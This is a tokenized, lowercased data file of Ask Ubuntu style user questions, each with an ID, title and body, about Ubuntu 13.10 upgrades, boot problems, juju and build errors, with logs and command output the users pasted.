362191	lubuntu 13.10 - two network icons	i updated lubuntu 13.04 to 13.10 and now i have 2 network icons in the task bar what do i have to do so it displays just one icon ?
362192	what is -- user =	i found the following statement from mysql doc : scripts/mysql_install_db -- user=mysql i 'm wondering what is ' -- user=mysql ' from the above ? the statement has no command at all , so i 'm confused . thanks !
362194	i did a factory reset on windows 7 and now i ca n't boot into ubuntu , how can i fix this ?	i switched over to ubuntu about a month ago after windows 7 was corrupted and would n't boot anymore . i recently decided to restore windows 7 so i could play a game on it . unfortunately i had no restore points so i had to completely reformat the whole thing . now when i turn on my computer i no longer get the option to boot into ubuntu or windows 7 , it just boots straight to windows . when i check the c drive i still have the 20 gigs i set aside for ubuntu partitioned off . i 'm thinking that windows 7 reformatted the entire hard drive rather than just it 's own partition , but i 'm asking here to confirm my fears and make sure it is n't a fixable problem . i 'd really like to avoid having to reinstall ubuntu if at all possible .
362197	do i need jdk & jre in ubuntu ?	in windows 7 i had to install jdk & jre to program with eclipse . in the software center i can only find openjdk java 7 runtime . do i need both to program in eclipse ?
362198	why is `` libunity-scopes-json-def-desktop '' part of non-unity flavors in 13.10 ?	os : lubuntu 13.10 , clean install . i noticed an update for libunity-scopes-json-def-desktop . to find out what that is , i ran apt-cache show libunity-scopes-json-def-desktop and saw this , in part : [ 10:44 am ] ~ $ apt-cache show libunity-scopes-json-def-desktop package : libunity-scopes-json-def-desktop priority : optional section : gnome installed-size : 52 maintainer : ubuntu core developers < ubuntu-devel-discuss @ lists.ubuntu.com > architecture : all source : libunity version : 7.1.2+13.10.20131010-0ubuntu2 ... ... description-en : binding to get places into the launcher - desktop def file libunity is a shared library to be able to interact with the launcher and add places in unity environment . ... this package contains default scopes definition for the destkop . ... ... task : ubuntu-desktop , ubuntu-usb , edubuntu-desktop , edubuntu-usb , xubuntu-desktop , lubuntu-desktop , ubuntustudio-desktop , ubuntu-gnome-desktop is the presence of this package in lubuntu and other non-unity flavors intentional ?
362199	i 've used ubunetin to install on flash drive but now bios / pc wo n't read !	so far i 've tried everything from ubuntu 12.04 to ubuntu 13.10 and none of them want to boot of my flash drive . i 've even tried changing the flash drive . one a 8gb pny and another being a onetouch external hard drive . if you could help i would be very grateful .
362201	phpliteadmin cant find sqlite3	i installed sqlite3 using sudo apt-get install sqlite3 . i also installed phpliteadmin in the var/www folder . when i go on phpliteadmin , it says it cant find sqlite3 and sqlite3database . how do i fix this ? sqlite3 works fine in terminal .
362205	ubuntu 13.10/gnome shell keeps asking me for my e-mail accounts passwords but says they are wrong . how can i fix this ?	ubuntu 13.10/gnome shell keeps asking me for my e-mail accounts passwords but says they are wrong . after login , in gnome shell , it asks for my two email accounts passwords . when i insert them it tells me they 're wrong . i cancel and a bit after it asks me again . over and over . i think this has something to do with the evolution gnome-shell extension but i can fix it .
362207	purple screen to black screen	i 'm farely new to ubuntu . i upgraded from 12.04 to 12.10 . on restart only got a purple to black screen . after using ctrl f1 i could type in my ser name and password but still no desktop . i tried `` startx '' but after it looked like it 's going to start it ended with the following : fatal server error : no screens found ( ee ) server terminated with error ( 1 ) . closing log file . xinit : giving up xinit : unable to connect to x server : connection refused xinit : server error i am trying to get to my desktop to get into my files . i have some recent work saved their so i do n't want to reinstall . some advice please
362208	how to dual boot ubuntu 13.10 with windows 8 ( non uefi )	i just want to ask.. how to dual boot ubuntu 13.10 x64 with windows 8 x64 ( non uefi installation ) ? and can i use default windows 8 grub ? because i like it so much . just search for the answer ( almost ) anywhere but find no answer . i am using asus a46cb with core i3 processor . thank you for your help.. : ) p.s . : i have 3 primary partition ( that detected in windows 8 explorer ) with mbr partition style
362210	juju bootstrap fails with a local environment , why ?	each time i try to bootstrap juju using a local enviroment it fails starting the juju-db-braiam-local script as follows : $ sudo juju -- debug -- verbose bootstrap 2013-10-20 02:28:53 info juju.provider.local environprovider.go:32 opening environment `` local '' 2013-10-20 02:28:53 debug juju.provider.local environ.go:210 found `` 10.0.3.1 '' as address for `` lxcbr0 '' 2013-10-20 02:28:53 debug juju.provider.local environ.go:234 checking 10.0.3.1:8040 to see if machine agent running storage listener 2013-10-20 02:28:53 debug juju.provider.local environ.go:237 nope , start some 2013-10-20 02:28:53 debug juju.environs.tools storage.go:87 uploading tools for [ raring precise ] 2013-10-20 02:28:53 debug juju.environs.tools build.go:109 looking for : juju 2013-10-20 02:28:53 debug juju.environs.tools build.go:150 checking : /usr/bin/jujud 2013-10-20 02:28:53 info juju.environs.tools build.go:156 found existing jujud 2013-10-20 02:28:53 info juju.environs.tools build.go:166 target : /tmp/juju-tools243949228/jujud 2013-10-20 02:28:53 debug juju.environs.tools build.go:217 forcing version to 1.14.1.1 2013-10-20 02:28:53 debug juju.environs.tools build.go:37 adding entry : & tar.header { name : '' force-version '' , mode:420 , uid:0 , gid:0 , size:8 , modtime : time.time { sec:63517832933 , nsec:278894120 , loc : ( *time.location ) ( 0x108fda0 ) } , typeflag:0x30 , linkname : '' '' , uname : '' ubuntu '' , gname : '' ubuntu '' , devmajor:0 , devminor:0 , accesstime : time.time { sec:63517832933 , nsec:278894120 , loc : ( *time.location ) ( 0x108fda0 ) } , changetime : time.time { sec:63517832933 , nsec:278894120 , loc : ( *time.location ) ( 0x108fda0 ) } } 2013-10-20 02:28:53 debug juju.environs.tools build.go:37 adding entry : & tar.header { name : '' jujud '' , mode:493 , uid:0 , gid:0 , size:19179512 , modtime : time.time { sec:63517832933 , nsec:274894120 , loc : ( *time.location ) ( 0x108fda0 ) } , typeflag:0x30 , linkname : '' '' , uname : '' ubuntu '' , gname : '' ubuntu '' , devmajor:0 , devminor:0 , accesstime : time.time { sec:63517832933 , nsec:274894120 , loc : ( *time.location ) ( 0x108fda0 ) } , changetime : time.time { sec:63517832933 , nsec:274894120 , loc : ( *time.location ) ( 0x108fda0 ) } } 2013-10-20 02:28:55 info juju.environs.tools storage.go:106 built 1.14.1.1-raring-amd64 ( 4196kb ) 2013-10-20 02:28:55 info juju.environs.tools storage.go:112 uploading 1.14.1.1-precise-amd64 2013-10-20 02:28:55 info juju.environs.tools storage.go:112 uploading 1.14.1.1-raring-amd64 2013-10-20 02:28:55 info juju.environs.tools tools.go:29 reading tools with major version 1 2013-10-20 02:28:55 info juju.environs.tools tools.go:34 filtering tools by version : 1.14.1.1 2013-10-20 02:28:55 info juju.environs.tools tools.go:37 filtering tools by series : precise 2013-10-20 02:28:55 debug juju.environs.tools storage.go:41 reading v1 . * tools 2013-10-20 02:28:55 debug juju.environs.tools storage.go:61 found 1.14.1.1-precise-amd64 2013-10-20 02:28:55 debug juju.environs.tools storage.go:61 found 1.14.1.1-raring-amd64 2013-10-20 02:28:55 info juju.environs.boostrap bootstrap.go:57 bootstrapping environment `` local '' 2013-10-20 02:28:55 info juju.environs.tools tools.go:29 reading tools with major version 1 2013-10-20 02:28:55 info juju.environs.tools tools.go:34 filtering tools by version : 1.14.1.1 2013-10-20 02:28:55 info juju.environs.tools tools.go:37 filtering tools by series : precise 2013-10-20 02:28:55 debug juju.environs.tools storage.go:41 reading v1 . * tools 2013-10-20 02:28:55 debug juju.environs.tools storage.go:61 found 1.14.1.1-precise-amd64 2013-10-20 02:28:55 debug juju.environs.tools storage.go:61 found 1.14.1.1-raring-amd64 2013-10-20 02:28:55 debug juju.provider.local environ.go:395 create mongo journal dir : /home/braiam/.juju/local/db/journal 2013-10-20 02:28:55 debug juju.provider.local environ.go:401 generate server cert 2013-10-20 02:28:55 info juju.provider.local environ.go:421 installing service juju-db-braiam-local to /etc/init 2013-10-20 02:28:56 error juju.provider.local environ.go:423 could not install mongo service : exec [ `` start '' `` juju-db-braiam-local '' ] : exit status 1 ( start : job failed to start ) 2013-10-20 02:28:56 error juju supercommand.go:282 command failed : exec [ `` start '' `` juju-db-braiam-local '' ] : exit status 1 ( start : job failed to start ) error : exec [ `` start '' `` juju-db-braiam-local '' ] : exit status 1 ( start : job failed to start ) what is the reason for this error and how to solve it ?
362212	how can i change my graphics card power profile ?	the fan on my card is noticeably louder in ubuntu than in windows . i suspect this is because it 's running on a medium / high power profile , how can i change it to low ? video card : radeon 9670
362213	ubuntu crashes @ login screen	i 've installed ubuntu using the installer for microsoft windows . when i start up up the operating system , i enter the login screen of ubuntu . everything is fine at that moment except my mouse and keyboard are frozen . next i hear a `` bongo '' noise which is obviously the system looping and getting ready to crash . soon enough , i enter a purple screen with white diagonal short lines in the background . i am then forced to unplug my desktop . any way to fix this ?
362217	why is the upgrade manager freezing when upgrading to 13.10	earlier today i started to upgrade to 13.10 only to return much much later and notice that the update manager was still running . it seems to be frozen and i am reluctant to hit ctrl+c . i ca n't launch nautilus using the icon on the launcher . when i try to run it via the terminal , this is what happens : $ nautilus could not register the application : gdbus.error : org.freedesktop.dbus.error.unknownmethod : no such interface `org.gtk.actions ' on object at path /org/gnome/nautilus my printers are n't showing up when i attempt to print . i do n't know whether these a symptoms of the same problem . should i let the update manage continue to run , or should i shut it down ? here are the processes running if it is any help : $ ps aux user pid % cpu % mem vsz rss tty stat start time command root 1 0.0 0.2 5920 4072 ? ss oct18 0:02 /sbin/init root 2 0.0 0.0 0 0 ? s oct18 0:00 [ kthreadd ] root 3 0.0 0.0 0 0 ? s oct18 0:31 [ ksoftirqd/0 ] root 5 0.0 0.0 0 0 ? s < oct18 0:00 [ kworker/0:0h ] root 6 0.0 0.0 0 0 ? s oct18 0:00 [ kworker/u:0 ] root 7 0.0 0.0 0 0 ? s < oct18 0:00 [ kworker/u:0h ] root 8 0.0 0.0 0 0 ? s oct18 0:00 [ migration/0 ] root 9 0.0 0.0 0 0 ? s oct18 0:00 [ rcu_bh ] root 10 0.0 0.0 0 0 ? s oct18 0:54 [ rcu_sched ] root 11 0.0 0.0 0 0 ? s oct18 0:00 [ watchdog/0 ] root 12 0.0 0.0 0 0 ? s oct18 0:00 [ watchdog/1 ] root 13 0.0 0.0 0 0 ? s oct18 0:43 [ ksoftirqd/1 ] root 14 0.0 0.0 0 0 ? s oct18 0:00 [ migration/1 ] root 16 0.0 0.0 0 0 ? s < oct18 0:00 [ kworker/1:0h ] root 17 0.0 0.0 0 0 ? s < oct18 0:00 [ cpuset ] root 18 0.0 0.0 0 0 ? s < oct18 0:00 [ khelper ] root 19 0.0 0.0 0 0 ? s oct18 0:00 [ kdevtmpfs ] root 20 0.0 0.0 0 0 ? s < oct18 0:00 [ netns ] root 21 0.0 0.0 0 0 ? s oct18 0:00 [ bdi-default ] root 22 0.0 0.0 0 0 ? s < oct18 0:00 [ kintegrityd ] root 23 0.0 0.0 0 0 ? s < oct18 0:00 [ kblockd ] root 24 0.0 0.0 0 0 ? s < oct18 0:00 [ ata_sff ] root 25 0.0 0.0 0 0 ? s oct18 0:00 [ khubd ] root 26 0.0 0.0 0 0 ? s < oct18 0:00 [ md ] root 27 0.0 0.0 0 0 ? s < oct18 0:00 [ devfreq_wq ] root 29 0.0 0.0 0 0 ? s oct18 0:00 [ khungtaskd ] root 30 0.0 0.0 0 0 ? s oct18 0:09 [ kswapd0 ] root 31 0.0 0.0 0 0 ? sn oct18 0:00 [ ksmd ] root 32 0.0 0.0 0 0 ? sn oct18 0:00 [ khugepaged ] root 33 0.0 0.0 0 0 ? s oct18 0:00 [ fsnotify_mark ] root 34 0.0 0.0 0 0 ? s oct18 0:00 [ ecryptfs-kthre root 35 0.0 0.0 0 0 ? s < oct18 0:00 [ crypto ] root 46 0.0 0.0 0 0 ? s < oct18 0:00 [ kthrotld ] root 49 0.0 0.0 0 0 ? s < oct18 0:00 [ binder ] root 69 0.0 0.0 0 0 ? s < oct18 0:00 [ deferwq ] root 70 0.0 0.0 0 0 ? s < oct18 0:00 [ charger_manage root 166 0.0 0.0 0 0 ? s oct18 0:00 [ scsi_eh_0 ] root 167 0.0 0.0 0 0 ? s oct18 0:00 [ scsi_eh_1 ] root 188 0.0 0.0 0 0 ? s oct18 0:00 [ scsi_eh_2 ] root 244 0.0 0.0 0 0 ? s oct18 0:00 [ kworker/u:4 ] root 245 0.0 0.0 0 0 ? s < oct18 0:00 [ ttm_swap ] root 260 0.0 0.0 0 0 ? s oct18 0:00 [ scsi_eh_3 ] root 266 0.0 0.0 0 0 ? s oct18 0:00 [ scsi_eh_4 ] root 267 0.0 0.0 0 0 ? s oct18 1:08 [ usb-storage ] root 268 0.0 0.0 0 0 ? s oct18 0:00 [ scsi_eh_5 ] root 269 0.0 0.0 0 0 ? s oct18 0:06 [ usb-storage ] root 302 0.0 0.0 2904 504 ? s 14:11 0:00 upstart-udev-br root 305 0.0 0.0 12080 1632 ? ss 14:11 0:00 /lib/systemd/sy root 329 0.0 0.0 0 0 ? s oct18 0:24 [ jbd2/sda2-8 ] root 330 0.0 0.0 0 0 ? s < oct18 0:00 [ ext4-dio-unwri root 352 0.0 0.0 2944 4 ? s oct18 0:00 /sbin/ureadahea root 440 0.0 0.0 0 0 ? s oct18 0:05 [ flush-8:0 ] root 734 0.0 0.0 0 0 ? s < oct18 0:00 [ cfg80211 ] root 761 0.0 0.0 0 0 ? s < oct18 0:00 [ kpsmoused ] root 780 0.0 0.0 0 0 ? s oct18 0:00 [ pccardd ] root 784 0.0 0.0 0 0 ? s < oct18 0:00 [ kvm-irqfd-clea root 902 0.0 0.0 0 0 ? s < oct18 0:00 [ hd-audio0 ] syslog 916 0.0 0.0 31120 680 ? sl oct18 0:13 rsyslogd -c5 102 1010 0.0 0.1 4344 1988 ? ss oct18 0:04 dbus-daemon -- s root 1061 0.0 0.0 4844 924 ? ss oct18 0:00 /usr/sbin/bluet root 1077 0.0 0.0 2268 388 ? ss oct18 0:00 /bin/sh /etc/in root 1079 0.0 0.0 4664 484 tty4 ss+ oct18 0:00 /sbin/getty -8 root 1087 0.0 0.0 4664 484 tty5 ss+ oct18 0:00 /sbin/getty -8 root 1089 0.0 0.0 0 0 ? s < oct18 0:00 [ krfcommd ] root 1098 0.0 0.0 4664 484 tty2 ss+ oct18 0:00 /sbin/getty -8 root 1099 0.0 0.1 4408 2076 tty3 ss oct18 0:00 /bin/login -- root 1101 0.0 0.0 4664 484 tty6 ss+ oct18 0:00 /sbin/getty -8 root 1168 0.0 0.0 2780 524 ? ss oct18 0:00 cron daemon 1169 0.0 0.0 2636 212 ? ss oct18 0:00 atd root 1183 0.0 0.0 34872 1448 ? slsl oct18 0:00 lightdm root 1249 0.0 0.0 3536 468 ? s oct18 0:00 /bin/bash /etc/ root 1254 4.2 2.2 125832 40040 tty7 rsl+ oct18 81:27 /usr/bin/x :0 - root 1261 0.0 0.0 2268 344 ? s oct18 0:00 /bin/sh /etc/ac root 1265 0.0 0.1 42004 2836 ? ssl oct18 0:01 networkmanager root 1272 0.0 0.0 2268 376 ? s oct18 0:00 /bin/sh /usr/sb root 1286 0.0 0.3 30616 5824 ? sl oct18 0:05 /usr/lib/policy root 1304 0.0 0.0 2268 372 ? d oct18 0:00 /bin/sh /usr/li root 1360 0.0 0.0 5532 560 ? s oct18 0:00 /sbin/dhclient nobody 1368 0.0 0.0 5476 784 ? s oct18 0:00 /usr/sbin/dnsma root 1514 0.0 0.1 34036 1932 ? sl oct18 0:01 /usr/lib/accoun root 1530 0.0 0.0 0 0 ? s oct18 0:00 [ kauditd ] root 1536 0.0 0.1 30480 2260 ? sl oct18 0:01 /usr/sbin/conso root 1653 0.0 0.1 28908 2104 ? sl oct18 0:00 /usr/lib/upower root 1698 0.0 0.0 17464 1388 ? sl oct18 0:00 lightdm -- sessi rtkit 1750 0.0 0.0 21368 696 ? snl oct18 0:00 /usr/lib/rtkit/ 1000 1844 0.0 0.1 88116 2320 ? sll oct18 0:00 /usr/bin/gnome- 1000 1855 0.0 0.3 73076 5884 ? ssl oct18 0:00 gnome-session - 1000 1901 0.0 0.0 4128 24 ? ss oct18 0:00 /usr/bin/ssh-ag 1000 1904 0.0 0.0 3880 192 ? s oct18 0:00 /usr/bin/dbus-l 1000 1905 0.0 0.1 5520 2500 ? ss oct18 0:23 //bin/dbus-daem 1000 1915 0.0 0.0 43348 1420 ? sl oct18 0:00 /usr/lib/at-spi 1000 1919 0.0 0.0 3412 1252 ? s oct18 0:01 /bin/dbus-daemo 1000 1922 0.0 0.0 17176 1624 ? sl oct18 0:00 /usr/lib/at-spi 1000 1932 0.0 0.5 165916 9124 ? sl oct18 0:21 /usr/lib/gnome- 1000 1947 1.9 0.2 100716 4024 ? s < l oct18 37:48 /usr/bin/pulsea 1000 1949 0.0 0.0 27568 1616 ? sl oct18 0:00 /usr/lib/gvfs/g 1000 1953 0.0 0.0 42628 1184 ? sl oct18 0:00 /usr/lib/gvfs// 1000 1962 0.0 0.0 14472 916 ? s oct18 0:00 /usr/lib/pulsea 1000 1964 0.0 0.1 9548 2480 ? s oct18 0:00 /usr/lib/i386-l 1000 1980 0.0 0.0 3764 364 ? s oct18 0:43 syndaemon -i 1 . 1000 1987 0.0 0.0 24476 1668 ? sl oct18 0:00 /usr/lib/dconf/ 1000 1990 0.0 0.4 122968 8844 ? sl oct18 0:00 /usr/lib/policy 1000 1991 0.0 0.2 80480 5392 ? sl oct18 0:00 /usr/lib/gnome- 1000 1992 0.0 1.2 167532 22776 ? sl oct18 0:07 nautilus -n 1000 1998 0.0 0.4 181444 7744 ? sl oct18 0:00 nm-applet 1000 2002 0.0 0.1 38020 2892 ? sl oct18 0:00 /usr/lib/gvfs/g root 2012 0.0 0.1 59908 2664 ? sl oct18 0:24 /usr/lib/udisks 1000 2024 0.0 0.0 26456 1540 ? sl oct18 0:00 /usr/lib/gvfs/g 1000 2028 0.0 0.0 27684 1536 ? sl oct18 0:00 /usr/lib/gvfs/g 1000 2036 0.0 0.0 38964 1452 ? sl oct18 0:00 /usr/lib/gvfs/g root 2049 0.0 0.0 3328 588 ? ss oct18 0:00 /sbin/mount.ntf 1000 2053 0.0 0.0 36792 1284 ? sl oct18 0:00 /usr/lib/gvfs/g 1000 2058 0.0 0.1 53664 2364 ? sl oct18 0:00 /usr/lib/gvfs/g 1000 2069 0.0 0.4 82816 8112 ? sl oct18 0:07 /usr/lib/i386-l 1000 2084 0.0 0.1 17984 2048 ? sl oct18 0:00 /usr/lib/gvfs/g 1000 2086 0.0 0.0 2268 392 ? ss oct18 0:00 /bin/sh -c /usr 1000 2087 0.0 0.7 68100 12856 ? sl oct18 0:13 /usr/bin/gtk-wi 1000 2089 0.0 0.9 98508 17756 ? sl oct18 0:13 /usr/lib/unity/ 1000 2091 0.0 0.3 65380 6692 ? sl oct18 0:01 /usr/lib/i386-l 1000 2117 0.0 0.2 98024 3888 ? sl oct18 0:00 /usr/lib/i386-l 1000 2125 0.0 0.1 86644 3408 ? sl oct18 0:00 /usr/lib/indica 1000 2126 0.0 0.3 84272 6664 ? sl oct18 0:00 /usr/lib/i386-l 1000 2127 0.0 0.1 94384 2752 ? sl oct18 0:00 /usr/lib/i386-l 1000 2128 0.0 0.1 83968 2828 ? sl oct18 0:00 /usr/lib/i386-l 1000 2129 0.0 0.2 150020 4684 ? sl oct18 0:01 /usr/lib/i386-l 1000 2130 0.0 0.2 86572 3884 ? sl oct18 0:00 /usr/lib/indica 1000 2131 0.0 0.1 69352 2524 ? sl oct18 0:00 /usr/lib/i386-l 1000 2144 0.0 0.1 74192 3152 ? sl oct18 0:00 /usr/lib/evolut 1000 2182 0.0 0.2 101120 4420 ? sl oct18 0:02 /usr/lib/gnome- 1000 2193 0.0 0.3 77752 6448 ? sl oct18 0:00 telepathy-indic 1000 2200 0.0 0.1 44032 2708 ? sl oct18 0:00 /usr/lib/telepa 1000 2209 0.0 0.2 77664 3860 ? sl oct18 0:02 zeitgeist-datah 1000 2216 0.0 0.2 44464 4180 ? sl oct18 0:01 /usr/bin/zeitge root 2234 0.0 0.0 0 0 ? s < oct18 0:00 [ kworker/1:1h ] 1000 2246 0.0 1.1 93428 21256 ? sl oct18 0:02 /usr/bin/python 1000 2284 0.0 0.6 110040 11656 ? sl oct18 0:14 /usr/lib/i386-l 1000 2289 0.0 0.2 85632 3728 ? sl oct18 0:00 /usr/lib/i386-l 1000 2296 0.0 0.1 77900 3388 ? sl oct18 0:00 /usr/lib/i386-l 1000 2298 0.0 0.6 120356 11992 ? sl oct18 0:00 /usr/bin/python 1000 2300 0.0 0.1 87560 2408 ? sl oct18 0:00 /usr/lib/i386-l 1000 2301 0.0 0.2 91764 4404 ? sl oct18 0:00 /usr/lib/i386-l 1000 2303 0.0 0.2 78224 4592 ? sl oct18 0:00 /usr/lib/i386-l 1000 2370 0.0 0.2 74976 4908 ? sl oct18 0:00 /usr/lib/i386-l 1000 2372 0.0 0.4 106760 8972 ? sl oct18 0:00 /usr/bin/python 1000 2394 0.0 0.1 95624 2736 ? sl oct18 0:00 /usr/lib/i386-l 1000 2433 0.0 0.1 46640 2124 ? sl oct18 0:00 /usr/lib/i386-l 1000 2457 0.0 0.0 34496 1648 ? sl oct18 0:00 /usr/lib/libuni root 2513 0.0 0.0 0 0 ? s < oct18 0:00 [ kworker/0:1h ] 1000 3361 0.0 0.0 2268 396 ? sn 07:54 0:20 /bin/sh -c /usr root 4919 1.8 2.1 201196 38760 ? snl 13:29 11:25 /usr/bin/python root 4957 0.0 0.0 3880 400 ? sn 13:29 0:00 dbus-launch -- a root 4958 0.0 0.0 3424 1196 ? sns 13:29 0:05 //bin/dbus-daem root 5128 0.0 0.0 2268 416 ? sn 13:50 0:00 /bin/sh -c whil root 5141 0.0 0.0 2436 508 ? sn 13:50 0:00 gnome-pty-helpe root 5145 0.0 1.7 245280 30872 pts/1 sns+ 13:50 0:05 /usr/bin/python root 5159 0.0 0.4 64200 7432 ? snl 13:50 0:05 /usr/bin/gnome- root 5163 0.0 0.0 27440 1552 ? snl 13:50 0:00 /usr/lib/gvfs/g root 5167 0.0 0.0 42628 1648 ? snl 13:50 0:00 /usr/lib/gvfs// root 9236 0.0 0.1 19112 2680 ? ss 14:33 0:00 /usr/sbin/winbi root 9243 0.0 0.0 19112 1448 ? s 14:33 0:00 /usr/sbin/winbi whoopsie 9409 0.0 0.2 53608 4264 ? ssl 14:33 0:00 whoopsie root 20087 0.0 0.0 0 0 ? s < 14:34 0:00 [ xfsalloc ] root 20088 0.0 0.0 0 0 ? s < 14:34 0:00 [ xfs_mru_cache ] root 20089 0.0 0.0 0 0 ? s < 14:34 0:00 [ xfslogd ] root 20092 0.0 0.0 0 0 ? s 14:34 0:00 [ jfsio ] root 20093 0.0 0.0 0 0 ? s 14:34 0:00 [ jfscommit ] root 20094 0.0 0.0 0 0 ? s 14:34 0:00 [ jfscommit ] root 20095 0.0 0.0 0 0 ? s 14:34 0:00 [ jfssync ] root 20845 0.0 0.3 7980 6048 pts/2 sns+ 14:29 0:04 /usr/bin/dpkg - root 23330 0.0 0.0 2896 568 ? s 14:09 0:00 upstart-file-br root 23332 0.0 0.0 2884 572 ? s 14:09 0:00 upstart-socket- root 24577 0.2 0.0 0 0 ? s 23:09 0:04 [ kworker/1:2 ] root 24656 0.1 0.0 0 0 ? s 23:10 0:02 [ kworker/0:0 ] 1000 24758 2.8 4.7 243692 85516 ? sl 23:11 0:50 compiz root 25774 0.0 0.0 0 0 ? s < 14:39 0:00 [ iprt ] 1000 26128 5.5 10.3 641628 187420 ? sl 23:27 0:46 /usr/lib/firefo root 26374 0.0 0.0 3964 720 ? ss 14:39 0:02 /usr/sbin/irqba root 26534 0.0 0.0 0 0 ? s 23:34 0:00 [ kworker/0:1 ] root 26564 0.0 0.0 0 0 ? s 23:35 0:00 [ kworker/1:1 ] 1000 26664 0.0 0.1 6784 3068 tty3 s+ 23:36 0:00 -bash 1000 26936 15.2 1.3 67520 23672 ? sl 23:39 0:21 gnome-system-mo root 26992 0.0 0.0 0 0 ? s 23:40 0:00 [ kworker/1:0 ] root 27049 0.0 0.0 4248 288 ? sn 23:41 0:00 sleep 30 1000 27057 9.5 0.8 68624 16140 ? rl 23:41 0:00 gnome-terminal 1000 27064 0.0 0.0 2440 704 ? s 23:41 0:00 gnome-pty-helpe 1000 27065 2.6 0.1 6344 2608 pts/3 ss 23:41 0:00 bash 1000 27113 0.0 0.0 5240 1144 pts/3 r+ 23:41 0:00 ps aux root 28267 0.0 0.0 2216 632 ? ss 14:39 0:00 acpid -c /etc/a root 28333 0.0 0.0 2272 552 pts/2 sn+ 14:39 0:00 /bin/sh /var/li root 29699 0.0 0.2 8384 4608 pts/2 sn+ 14:40 0:00 modprobe wl update after hitting ctrl+c failed to stop the update manager , i right clicked the icon corresponding to the the upgrade and selected quit . then the upgrade prompted me : cancel the running upgrade ? the system could be in an unusable state if you cancel the upgrade . you are strongly advised to resume the upgrade . i selected cancel upgrade and now the upgrade is frozen ( not stuck as before ) . i do n't know the name of the process so i can not kill it through the gnome-system-monitor . also , i noticed that the menu bars have disappeared from open windows . update i restarted lightdm with sudo service lightdm restart and that seemingly solved the graphical issues at the time . dpkg still would not run since another process was using it . then the computer became extremely slow and froze ( felt like i was using windows ! ) . i decided to alt+sys rec+reisub . when the system tried to start up , there was this following message : filesystem check or mount failed . a maintenance shell will now be started . control-d will terminate this shell and continue booting after re-trying filesystems . any further errors will be ignored . no matter what i do , ctrl+d returns the following message : exit mountall start/starting filesystem check or mount failed . a maintenance shell will now be started . control-d will terminate this shell and continue booting after re-trying filesystems . any further errors will be ignored . i tried booting in recovery mode and selected to repair system using dpkg and that got stuck in the same place the upgrade was stuck . going back into the maintenance shell , i tried : $ fsck fsck from util-linux 2.20.1 e2fsck 1.42.8 ( 20-jun-2013 ) /dev/sda2 : clean , 679749/18587648 files , 51278336/74323968 blocks then i tried : $ fsck -f fsck from util-linux 2.20.1 e2fsck 1.42.8 ( 20-jun-2013 ) pass 1 : checking inodes , blocks , and sizes pass 2 : checking directory structures pass 3 : checking directory connectivity pass 4 : checking reference counts pass 5 : checking group summary information /dev/sda2 : 679749/18587648 files ( 0.3 % non-contiguous ) , 51278336/74323968 blocks right now i am using 12.10 via a thumbdrive i had lying around . tried to repair file system using : $ sudo fsck -t ext4 /dev/sdb2 fsck from util-linux 2.20.1 e2fsck 1.42.5 ( 29-jul-2012 ) ext2fs_check_if_mount : input/output error while determining whether /dev/sdb2 is mounted . /dev/sdb2 : clean , 679749/18587648 files , 51278336/74323968 blocks i made sure the partition was unmounted before trying that of course . after trying mount -o remount , rw / and using the recommended dpkg -- configure -a in the maintenance shell , it seem to continue upgrading where it left off ( that made it pass where it was stuck on prior attempts ) . however , it seems to have aborted due to too many errors . i then restarted the system and it booted fine ( i was happy at that point ) . i opened up a terminal and ran sudo apt-get install and while doing its thing the whole system froze . i restarted and it would n't boot from the drive . the partition table seems to be corrupted now . i posted a new question concerning the corrupted partition table ...
362218	cant get to install menu , livecd	when i tried to run the ubuntu install disc i get a purple screen with some little images down the bottom , then a flashing cursor for a second and then the screen goes black like there is no in i have tried changing bios settings that supposedly interfere , different disk drives and trying to access the advanced menu all to no avail ! all the answers for black screens require you to be able to get the menu which i cant ! help would be much appreciated !
362219	what are some recommendable wireless usb network adapters for ubuntu ?	i recently built a new pc and though i bought a wireless usb network adapter , i later realized that it does n't support linux . what are some suggestions for good usb wireless adapters for linux ? either 150mbps or 300mbps is fine for me .
362222	how can i restore my external hard drive	i mistakenly saved a windows 8.1 recovery drive on my 1tb external hard 39gb partition . since then , i have not been able to access the other partition . i have formatted the hard drive and the memory is still 39gb . what can i do to restore back to the 1tb ? ?
362226	how discover what 's the uuid of connect network from terminal ?	i 'm developing a little application in python ( at moment just learning ) and i need discover what 's the `` uuid '' of the currently connected network . i have the following script to return the default network interface : route -n | awk ' $ 1 ~ /0.0.0.0/ { print $ nf } ' now how i can discover , from terminal , what 's the network that i 'm currently connected ?
362228	how to build the darling project on ubuntu ?	the darling project is an open source darwin/os x emulation layer for linux . i downloaded the source code with git and tried to build it with cmake but it failed . the document says i need these packages : clang 3.1+ gcc 4.6+ ( yes , you still need gcc for header files ) libkqueue libbsd gnustep-base ( `` foundation '' ) gnustep-gui ( `` cocoa '' ) gnustep-corebase ( `` corefoundation '' ) libobjc2 libudev openssl libasound libav libgc but i could not find them on apt or in software center . also cmake showed this result : no build type selected , default to debug this is a 64-bit build building objc abi 2 you have called add_library for library carbon without any source files . this typically indicates a problem with your cmakelists.txt file you have called add_library for library appkit without any source files . this typically indicates a problem with your cmakelists.txt file you have called add_library for library auto without any source files . this typically indicates a problem with your cmakelists.txt file cmake error : the following variables are used in this project , but they are set to notfound . please set them or make sure they are set and tested correctly in the cmake files : libgnustepcorebase_include_dir used as include directory in directory /home/mirror/work/darling/darling/src/motool used as include directory in directory /home/mirror/work/darling/darling/src/util used as include directory in directory /home/mirror/work/darling/darling/src/libmach-o used as include directory in directory /home/mirror/work/darling/darling/src/libdyld used as include directory in directory /home/mirror/work/darling/darling/src/dyld used as include directory in directory /home/mirror/work/darling/darling/src/dyld used as include directory in directory /home/mirror/work/darling/darling/src/libsystem used as include directory in directory /home/mirror/work/darling/darling/src/libltdl used as include directory in directory /home/mirror/work/darling/darling/src/cocoa used as include directory in directory /home/mirror/work/darling/darling/src/libobjcdarwin used as include directory in directory /home/mirror/work/darling/darling/src/corefoundation used as include directory in directory /home/mirror/work/darling/darling/src/libncurses used as include directory in directory /home/mirror/work/darling/darling/src/coresecurity used as include directory in directory /home/mirror/work/darling/darling/src/coreservices used as include directory in directory /home/mirror/work/darling/darling/src/exceptionhandling used as include directory in directory /home/mirror/work/darling/darling/src/iokit used as include directory in directory /home/mirror/work/darling/darling/src/foundation used as include directory in directory /home/mirror/work/darling/darling/src/carbon used as include directory in directory /home/mirror/work/darling/darling/src/corevideo used as include directory in directory /home/mirror/work/darling/darling/src/opengl used as include directory in directory /home/mirror/work/darling/darling/src/thin used as include directory in directory /home/mirror/work/darling/darling/src/thin used as include directory in directory /home/mirror/work/darling/darling/src/libstdc++darwin 